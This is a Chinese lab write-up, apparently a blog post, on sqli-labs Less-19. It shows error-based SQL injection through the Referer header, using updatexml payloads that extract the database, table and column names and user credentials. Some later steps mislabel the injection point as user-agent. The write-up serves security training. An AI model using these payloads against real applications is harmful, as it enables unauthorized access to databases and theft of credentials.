sqli-labs-Less-19自动化注入方法

sqli-labs 实验记录

Less-19

这一关与第18关类似,需要通过分析源码进行手动报错注入,但注入点与之前的关卡不同,为Referer。

第一步:分别输入正确与错误的用户名与密码,查找注入点

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Your Referer is: ......,密码错误的页面无任何回显。因此,我们考虑在Referer这一点进行报错注入。

第二步:查询服务器中的当前数据库

利用Hackbar插件,在Referer这一点输入如下数据:

复制代码
1' and updatexml(1,concat(0x7e,database(),0x7e),1) or '

updatexml 为报错注入函数。

结果如图所示:当前数据库为security。

第三步:查询指定数据库中的表

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的列

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) or '

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在user-agent注入点输入字符串:

复制代码
1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from security.users limit 0,1),0x7e),1) or '

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
网安情报局12 分钟前
如何选择合适的AI大模型:快快云安全AI大模型聚合平台全解析
人工智能·网络安全·ai大模型
qq_2837200528 分钟前
Python3 模块精讲:pymysql(第三方)- 连接 MySQL
mysql·adb·pymysql
李日灐33 分钟前
< 6 > Linux 自动化构建工具:makefile 详解 + 进度条实战小项目
linux·运维·服务器·后端·自动化·进度条·makefile
JZC_xiaozhong1 小时前
跨系统审批自动化怎么做?从采购到销售合同的完整方案
大数据·运维·自动化·流程自动化·数据集成与应用集成·业务流程管理·异构数据集成
czlczl200209251 小时前
MySQL 性能优化:前缀索引(Prefix Index)深度解析
数据库·mysql·性能优化
y = xⁿ2 小时前
MySQL八股知识合集
android·mysql·adb
忡黑梨2 小时前
eNSP_从直连到BGP全网互通
c语言·网络·数据结构·python·算法·网络安全
计算机安禾2 小时前
【Linux从入门到精通】第33篇:数据库MySQL/MariaDB安装与基础调优
linux·数据库·mysql
其实防守也摸鱼3 小时前
带你了解与配置phpmyadmin
笔记·安全·网络安全·pdf·编辑器·工具·调试
搞科研的小刘选手3 小时前
【高届数传感机电会议】第十二届传感器、机电一体化和自动化系统国际学术研讨会(ISSMAS 2026)
运维·人工智能·自动化·控制·传感器·传感·机电